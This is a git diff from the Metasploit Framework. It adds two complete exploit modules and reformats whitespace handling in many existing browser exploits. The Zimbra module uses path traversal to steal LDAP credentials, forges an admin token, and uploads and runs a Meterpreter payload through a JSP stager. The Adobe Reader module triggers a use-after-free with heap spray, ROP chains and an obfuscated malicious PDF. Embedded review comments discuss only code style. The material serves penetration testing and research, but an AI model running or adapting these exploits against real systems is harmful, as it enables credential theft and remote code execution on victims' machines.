@@ -0,0 +1,285 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include REXML + + Rank = ExcellentRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Zimbra Collaboration Server LFI', + 'Description' => %q{ + This module exploits a local file inclusion on Zimbra 8.0.2 and 7.2.2. The vulnerability + allows an attacker to get the LDAP credentials from the localconfig.xml file. The stolen + credentials allow the attacker to make requests to the service/admin/soap API. This can + then be used to create an authentication token for the admin web interface. This access + can be used to achieve remote code execution. This module has been tested on Zimbra + Collaboration Server 8.0.2 with Ubuntu Server 12.04. 
+ }, + 'Author' => + [ + 'rubina119', # Vulnerability discovery + 'Mekanismen ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-7091' ], + [ 'OSVDB', '100747' ], + [ 'BID', '64149' ], + [ 'EDB', '30085' ], + [ 'URL', 'http://cxsecurity.com/issue/WLB-2013120097' ] + ], + 'Privileged' => false, + 'Platform' => ['linux'], + 'Targets' => + [ + [ 'Zimbra 8.0.2 / Linux', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ], + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'DefaultTarget' => 0, + 'DisclosureDate' => "Dec 06 2013" + )) + register_options( + [ + Opt::RPORT(7071), + OptString.new('TARGETURI', [true, 'Path to zimbraAdmin web application', '/zimbraAdmin']), + OptInt.new('DEPTH', [true, 'Traversal depth until to reach the root path', 9]), + OptString.new('ZIMBRADIR', [true, 'Zimbra installation path on the target filesystem (/opt/zimbra by default)', '/opt/zimbra']) + ]) + end + + def check + res = send_traversal_query(traversal_path("conf/localconfig.xml")) + + unless res and res.code == 200 + return Exploit::CheckCode::Safe + end + + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Safe + end + end + + def exploit + print_status("#{peer} - Getting login credentials...") + res = send_traversal_query(traversal_path("conf/localconfig.xml")) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL") + end + + #this response is ~100% gzipped + begin + text = Rex::Text.ungzip(res.body) + rescue Zlib::GzipFile::Error + text = res.body.to_s + end + + if text =~ /name=\\"zimbra_user\\">";\sa\["(.*)<\/value>/ + zimbra_user = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + if text =~ 
/name=\\"zimbra_ldap_password\\">";\sa\["(.*)<\/value>/ + zimbra_pass = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") + end + + print_good("#{peer} - Got login credentials!") + print_status("#{peer} - Getting auth token...") + + soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy + + res = send_request_cgi({ + 'uri' => normalize_uri("service", "admin", "soap"), + 'method' => 'POST', + 'ctype' => 'application/soap+xml; charset="utf-8"', + 'headers' => + { + 'SOAPAction' => '"urn:zimbraAdmin#AuthRequest"', + }, + 'data' => soap_req + }) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to access service URL") + end + + if res.body.to_s =~ /(.*)<\/authToken>/ + auth_token = $1 + else + fail_with(Failure::Unknown, "#{peer} - Unable to get auth token") + end + + @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" + print_good("#{peer} - Got auth token!") + + #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler + #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ + #the intent is for a ZCO file, whatever that is. However any file will do and it's placed in /downloads/ which we can reach, how handy! 
+ + #push our meterpreter and then a stager jsp file that sets correct permissions, executes the meterpreter and removes itself afterwards + payload_name = rand_text_alpha(8+rand(8)) + stager_name = rand_text_alpha(8+rand(8)) + ".jsp" + + stager = gen_stager(payload_name) + payload_elf = generate_payload_exe + + #upload payload + print_status("#{peer} - Uploading payload") + res = upload_file(payload_name, payload_elf) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to get upload payload") + end + + #upload jsp stager + print_status("#{peer} - Uploading jsp stager") + res = upload_file(stager_name, stager) + + unless res and res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") + end + + register_files_for_cleanup( + "../jetty/webapps/zimbra/downloads/#{stager_name}", + "../jetty/webapps/zimbra/downloads/#{payload_name}" + ) + + print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + + res = send_request_cgi({ + 'uri' => normalize_uri("downloads", stager_name), + 'method' => 'GET', + }) + end + + def traversal_path(file_name) + ::File.join( + "../" * datastore['DEPTH'], + datastore['ZIMBRADIR'], + file_name + ) + end + + def send_traversal_query(traversal) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, "res", "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => { + 'v' => "091214175450", + 'skin' => "#{traversal}%00" + } + }) + + return res + end + + def upload_file(file_name, data) + req_id = rand_text_numeric(2).to_s + + post_data = Rex::MIME::Message.new + post_data.add_part("#{file_name}", nil, nil, "form-data; name=\"filename1\"") + post_data.add_part("#{data}", "application/octet-stream", nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"") + post_data.add_part("#{req_id}", nil, nil, "form-data; name=\"requestId\"") + + n_data = post_data.to_s + n_data 
= n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'uri' => normalize_uri("service", "extension", "clientUploader", "upload"), + 'method' => 'POST', + 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'data' => n_data, + 'cookie' => @cookie + }) + + return res + end + + def build_soap_req(zimbra_user, zimbra_pass) + xml = Document.new + soap_var = "ns1:AuthRequest" + + xml.add_element( + "soapenv:Envelope", + { + 'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance", + 'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema", + 'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/", + 'xmlns:ser' => "http://service.emulation.ws.mercury.com", + 'xmlns:env' => "http://www.w3.org/2003/05/soap-envelope", + 'xmlns:ns1' => "urn:zimbraAdmin", + 'xmlns:ns2' => "urn:zimbraAdmin", + }) + + xml.root.add_element("soapenv:Header") + xml.root.add_element("soapenv:Body") + + header = xml.root.elements[1] + body = xml.root.elements[2] + + header.add_element("ns2:context") + body.add_element("ns1:AuthRequest") + + ns1 = body.elements[1] + ns1.add_element( + "account", + { + 'by' => "name" + }) + + ns1.add_element("password") + + ns1.elements["account"].text = "#{zimbra_user}" + ns1.elements["password"].text = "#{zimbra_pass}" + + return xml.to_s + end + + def gen_stager(payload_name) + stager = "<%@ page import=\"java.util.*,java.io.*\"%>" + stager += " <%" + stager += " String uri = request.getRequestURI();" + stager += " String filename = uri.substring(uri.lastIndexOf(\"/\")+1);" + stager += " String jspfile = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/\" + filename;" + stager += " String payload = new java.io.File(application.getRealPath(request.getRequestURI())).getParent() + \"/#{payload_name}\";" + stager += " Process p = Runtime.getRuntime().exec(\"chmod 700 \" + payload);" + stager += " p.waitFor();" + stager += " p = Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");" + stager 
+= "%>" + + return stager + end +end diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 36fe557ff0..f9273b9133 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -263,7 +263,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index fabff8d451..6dd812a159 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index cf095c2b3b..e36cc12fe3 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -415,7 +415,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 2190b3c32b..3d433d9984 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb 
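Review bot: `register_options` in zimbra_lfi.rb is closed with `])` and passes no owner, while the other new modules in this diff close the same call with `], self.class)`. Unless the difference is intended, ending the call with `], self.class)` keeps the modules consistent and makes the option ownership explicit. In the same file the `res =` assigned from the final `send_request_cgi` in `exploit` is never read, so the assignment can be dropped.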
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index 3d9314b2b9..fde7448c30 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name} HTML") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 97bc8ef0e3..a491d05fd8 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending HTML to...") send_response(cli, html, {'Content-Type' => "text/html"} ) diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb new file mode 100644 index 0000000000..5432fbf4f3 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb 
@@ -0,0 +1,354 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Reader ToolButton Use After Free", + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in + November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order + to exploit Adobe Reader 9 the fileformat version of the exploit can be used. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :os_flavor => Msf::OperatingSystems::WindowsVersions::XP, + :ua_name => Msf::HttpClients::IE + }, + 'Targets' => + [ + [ 'Windows XP / IE / Adobe Reader 10/11', { } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 08 2013", + 'DefaultTarget' => 0)) + + end + + def on_request_exploit(cli, request, target_info) + print_status("request: #{request.uri}") + js_data = make_js(cli, target_info) + # Create the pdf + pdf = make_pdf(js_data) + print_status("Sending PDF...") + send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) + end + + def make_js(cli, target_info) + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; 
+ bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 
128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << 
eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + + EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << eol + + pdf << "%%EOF" << eol + pdf + end + +end + + +=begin + +* crash Adobe Reader 10.1.4 + +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 +eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 +AcroRd32_60000000!PDFLTerm+0xbb7cd: +604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? + +* crash Adobe Reader 11.0.2 + +(940.d70): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - +eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 +eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 +AcroRd32_60000000!DllCanUnloadNow+0x1493ae: +60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? + +=end +
diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
index ebd3b3c1d1..10af9660df 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb
@@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote
 |
- html.gsub(/^\t\t/, '')
+ html.gsub(/^ {4}/, '')
 end
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index 65a6251378..28b8003a0a 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
 #Clear the extra tabs
- content = content.gsub(/^\t\t/, '')
+ content = content.gsub(/^ {4}/, '')
 print_status("Sending exploit HTML")
 send_response_html(cli, content)
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
index 565059f26a..6f6f1a828b 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote
 MYHTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
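Review bot: In the new modules/exploits/windows/browser/adobe_toolbutton.rb, the Description says the module was tested on Adobe Reader 11.0.2 and 10.0.4, but the crash notes in the trailing `=begin` block are labelled 10.1.4; one of the two is presumably a typo, and the tested build should be stated consistently because readers use it to judge which installations are affected. The header comment also drops the colon from the URL and should read `# This module requires Metasploit: http://metasploit.com/download`. The helpers `RandomNonASCIIString`, `ioDef`, `ioRef`, `nObfu` and `ASCIIHexWhitespaceEncode` use mixed-case names and carry no comments; snake_case names with a one-line purpose comment each would follow Ruby convention.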
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
index 0c71156b21..98caf4c686 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -429,7 +429,7 @@ class Metasploit3 < Msf::Exploit::Remote
 MYHTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb
index 252215eb26..f5b75ab4bf 100644
--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending #{self.name} HTML")
 send_response(cli, html, { 'Content-Type' => 'text/html' })
diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb
index 23afc5aff9..0f8dff21d5 100644
--- a/modules/exploits/windows/browser/clear_quest_cqole.rb
+++ b/modules/exploits/windows/browser/clear_quest_cqole.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
 EOS
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 58a79b93fe..3a1a2953dc 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -306,7 +306,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
index 736ac1c5c6..b136a41c9f 100644
--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -262,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
index 1c0033be6d..2a9cfd1ae2 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -248,7 +248,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
index ecb5423b03..f6a01d021d 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote
 send_not_found(cli)
 return
 end
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
index 90a3207018..c85c94dcc8 100644
--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -375,7 +375,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
index dd02a89eb9..c841580762 100644
--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote
 HTML
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending html")
 send_response(cli, html, {'Content-Type'=>'text/html'})
diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
index 5620423d7f..7ea0cc7822 100644
--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
index 9675fe109f..01864436ff 100644
--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 html = load_exploit_html(my_target, cli)
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
 print_status("Sending HTML...")
 send_response(cli, html, {'Content-Type'=>'text/html'})
 end
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index 46288f4495..00e85c8625 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return
 end
- html = html.gsub(/^\t\t/, '')
+ html = html.gsub(/^ {4}/, '')
